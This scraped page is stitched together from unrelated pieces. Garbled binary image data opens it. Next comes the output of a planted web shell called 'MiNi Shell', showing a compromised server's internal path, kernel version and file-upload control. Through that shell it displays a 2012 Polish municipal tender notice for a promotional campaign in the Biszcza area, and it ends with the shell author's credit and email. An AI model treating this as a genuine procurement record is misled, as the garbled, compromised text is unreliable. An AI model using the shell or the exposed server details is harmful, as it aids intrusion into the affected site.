JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/296794-N-2012.html

<p class="kh_header"><b>Biszcza: Przygotowanie oraz realizacja kampanii promocyjnej dotyczącej obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny</b><br>
<b>Numer ogłoszenia: 296794 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Biszczy , Biszcza 79, 23-425 Biszcza, woj. lubelskie, tel. 084 6856022, faks 084 6856301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.gmina-biszcza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie oraz realizacja kampanii promocyjnej dotyczącej obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie publiczne realizowane jest w ramach projektu Marketingowe wsparcie dla rozwoju gospodarczego gmin powiatu biłgorajskiego finansowanego ze środków Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013 Oś priorytetowa II Infrastruktura ekonomiczna,  Działanie 2.4. Marketing Gospodarczy Schemat B.
Przedmiotem zamówienia jest Przygotowanie oraz realizacja kampanii promocyjnej dotyczącej obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny wspomagającej budowę marki obszaru jako terenu na którym warto inwestować, a stanowiącego jednocześnie silną markę turystyczną.

Przedmiot zamówienia obejmuje:
 Kampania promocyjna prasowa w dziennikach skierowanych do biznesu.
Wykonawca zobowiązany jest do opracowania materiałów do opublikowania w prasie składających się z grafiki oraz tekstu, zawierających informacje o projekcie Marketingowe wsparcie dla rozwoju gospodarczego gmin powiatu biłgorajskiego, prezentujące walory inwestycyjne i turystyczne obszaru. 
Materiały mają zajmować nie mniej niż 1 stronę danego dziennika. 
Wykonawca zobowiązany jest do zapewnienia co najmniej 2-krotnej emisji materiałów w ogólnopolskim płatnym dzienniku skierowanym do biznesu.
Publikowane materiały mają zawierać logo obszaru i informację o współfinansowaniu projektu ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013. Oś priorytetowa II Infrastruktura ekonomiczna, Działanie 2.4. Marketing Gospodarczy Schemat B. 
Zamawiający zastrzega sobie prawo do żądania zmiany wskazanych przez Wykonawcę w Koncepcji realizacji zamówienia: materiałów do publikacji w prasie, dziennika oraz terminu poszczególnych emisji. Zamawiający zgłosi swoje żądania Wykonawcy w terminie do 20 dni roboczych od dnia podpisania umowy. Wykonawca jest zobowiązany uwzględnić żądania Zamawiającego. 
Przez sformułowanie skierowany do biznesu Zamawiający rozumie, iż najważniejszym odbiorcą  medium są przedsiębiorcy lub zarządzający w przedsiębiorstwach.

Emisja spotu reklamowego skierowanego do biznesu w ogólnopolskiej TV.
Wykonawca zobowiązany jest do zapewnienia co najmniej 300-krotnej emisji 30-sekundowego spotu reklamowego dotyczącego obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny.
Spoty mają być emitowane na antenie ogólnopolskiej telewizji skierowanej do biznesu w następujących godzinach i proporcjach:
Od godziny 7:00 do 18:00 - 50% spotów.
Od godziny 18:00 do 23:00 - 50% spotów.
Zamawiający dostarczy wykonawcy 30-sekundowy spot reklamowy dotyczący obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny w formie elektronicznej.
Zamawiający zastrzega sobie prawo do żądania zmiany wskazanych przez Wykonawcę w Koncepcji realizacji zamówienia: telewizji, terminów emisji spotu. Zamawiający zgłosi swoje żądania Wykonawcy w terminie do 20 dni roboczych od dnia podpisania umowy. Wykonawca jest zobowiązany uwzględnić żądania Zamawiającego. 
Przez sformułowanie skierowana do biznesu Zamawiający rozumie, iż najważniejszym odbiorcą  medium są przedsiębiorcy lub zarządzający w przedsiębiorstwach.

 Emisja na projektorach w Lublinie, Chełmie, Zamościu, Białej Podlaskiej, Kraśniku, Puławach filmów promujących obszar.
Wykonawca zapewni emisję z dźwiękiem filmów promujących obszar gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny  na projektorach w centralnych punktach największych miast województwa lubelskiego:
Lublinie - 14 dniowa wyłączna kampania na ekranie wielkoformatowym LED o powierzchni co najmniej 12 m2.
Chełmie - 1 dniowa wyłączna kampania na ekranie wielkoformatowym LED o powierzchni co najmniej 12 m2.
Zamościu - 1 dniowa wyłączna kampania na ekranie wielkoformatowym LED o powierzchni co najmniej 12 m2.
Białej Podlaskiej - 1 dniowa wyłączna kampania na ekranie wielkoformatowym LED o powierzchni co najmniej 12 m2.
Kraśniku - 1 dniowa wyłączna kampania na ekranie wielkoformatowym LED o powierzchni co najmniej 12 m2.
Puławach - 1 dniowa wyłączna kampania na ekranie wielkoformatowym LED o powierzchni co najmniej 12 m2.
Wykonawca zapewni emisję wraz z dźwiękiem filmów w godzinach 7-19.
Ekran LED musi mieć powierzchnię co najmniej 12 m2 i musi być ustawiony w sposób zapewniający jak najlepszą widoczność wyświetlanych materiałów (dół ekranu nie niżej niż 150 cm nad ziemią i nie wyżej niż 300 cm, front ekranu niczym nie przysłonięty). Emisja dźwięku ma być zapewniona przez co najmniej 2 kolumny aktywne o mocy nie mniejszej niż 300Watt każda kolumna. Cały zestaw nie może odciągać uwagi od prezentowanych na ekranie LED materiałów. Zamawiający nie dopuszcza zastosowania ekranu LED zamontowanego na samochodzie. 
Zamawiający dostarczy wykonawcy 30-sekundowy spot reklamowy oraz 7-minutowy film promocyjny dotyczące obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny w formie elektronicznej.
Zamawiający zastrzega sobie prawo do żądania zmiany wskazanych przez Wykonawcę w Koncepcji realizacji zamówienia: miejsc emisji. Zamawiający zgłosi swoje żądania Wykonawcy w terminie do 20 dni roboczych od dnia podpisania umowy. Wykonawca jest zobowiązany uwzględnić żądania Zamawiającego. 
Emisja filmu o potencjale obszaru w telewizjach regionalnych i lokalnych województwa lubelskiego i podkarpackiego
Wykonawca zobowiązany jest do zapewnienia co najmniej 28-krotnej emisji 7-minutowego filmu promocyjnego dotyczącego obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny.
Film ma być emitowane na antenach telewizji regionalnych i lokalnych nadających na terenie województwa lubelskiego i województwa podkarpackiego w następujących godzinach: od godziny 16:00 do 22:00.
Zamawiający dostarczy wykonawcy 7-minutowy film promocyjny dotyczący obszaru gmin: Biszcza, Księżpol, Łukowa, Obsza, Potok Górny w formie elektronicznej.
Zamawiający zastrzega sobie prawo do żądania zmiany wskazanych przez Wykonawcę w Koncepcji realizacji zamówienia: telewizji, terminów emisji filmu. Zamawiający zgłosi swoje żądania Wykonawcy w terminie do 20 dni roboczych od dnia podpisania umowy. Wykonawca jest zobowiązany uwzględnić żądania Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udowodni, spełnienie warunku jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował łącznie następujące usługi:
Należycie wykonał co najmniej 1 kampanię wizerunkowo-promocyjną jednostek samorządu terytorialnego działających w partnerstwie o wartości co najmniej 24 600,00 zł brutto. 
Dokonał planowania mediów bądź kampanii wizerunkowych w ramach przygotowanej strategii promocji jednostek samorządu terytorialnego działających w partnerstwie o wartości co najmniej 24 600,00 zł brutto.
Przygotował co najmniej  1  koncepcje marki, bądź system identyfikacji wizualnej dla jednostek samorządu terytorialnego o wartości co najmniej 24 600,00 zł brutto
Posiada doświadczenie w planowaniu rozwoju gospodarczego jednostek samorządu terytorialnego (dla obszaru większego niż 3 jednostki samorządu terytorialnego) poprzez przygotowanie co najmniej 1 dokumentu strategicznego tego rodzaju o wartości co najmniej 24 600,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia ten warunek, jeżeli wykaże że dysponuje co najmniej dwoma osobami, z których każda spełnia następujące warunki:
Posiada wykształcenie wyższe magisterskie lub podyplomowe z zakresu - zarządzania i marketingu.
Posiada doświadczenie w każdej z następujących dziedzin: marketing, public relations, komunikacja reklamowa, zarządzanie mediami, reklama, zarządzanie strategiczne, obsługa jednostek samorządu terytorialnego, funkcjonowanie jednostek samorządu terytorialnego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-zamawiający  nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Przedstawienie materiałów do publikacji w prasie, wskazanie wybranego dziennika oraz określenie terminu poszczególnych emisji wraz z uzasadnieniem - 8</li>
<li>3 - Określenie wyboru telewizji oraz terminów emisji spotu wraz z uzasadnieniem. W koncepcji wskazać także należy ilu odbiorców dotrze emitowany spot. - 5</li>
<li>4 - Określenie miejsca emisji na ekranie LED i opisem medium wraz z uzasadnieniem wyboru i nośnika.... - 4</li>
<li>5 - W koncepcji wskazać także należy do ilu odbiorców dotrze emitowany film - 5</li>
<li>6 - Ogólna wartość merytoryczna koncepcji - 18</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gmina-biszcza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gimny w Biszczy, Biszcza 79, 23-245 Biszcza, pok. nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: Urząd Gimny w Biszczy, Biszcza 79, 23-245 Biszcza, pok. nr 6 ( sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne realizowane jest w ramach projektu Marketingowe wsparcie dla rozwoju gospodarczego gmin powiatu biłgorajskiego finansowanego ze środków Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013 Oś priorytetowa II Infrastruktura ekonomiczna,  Działanie 2.4. Marketing Gospodarczy Schemat B..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com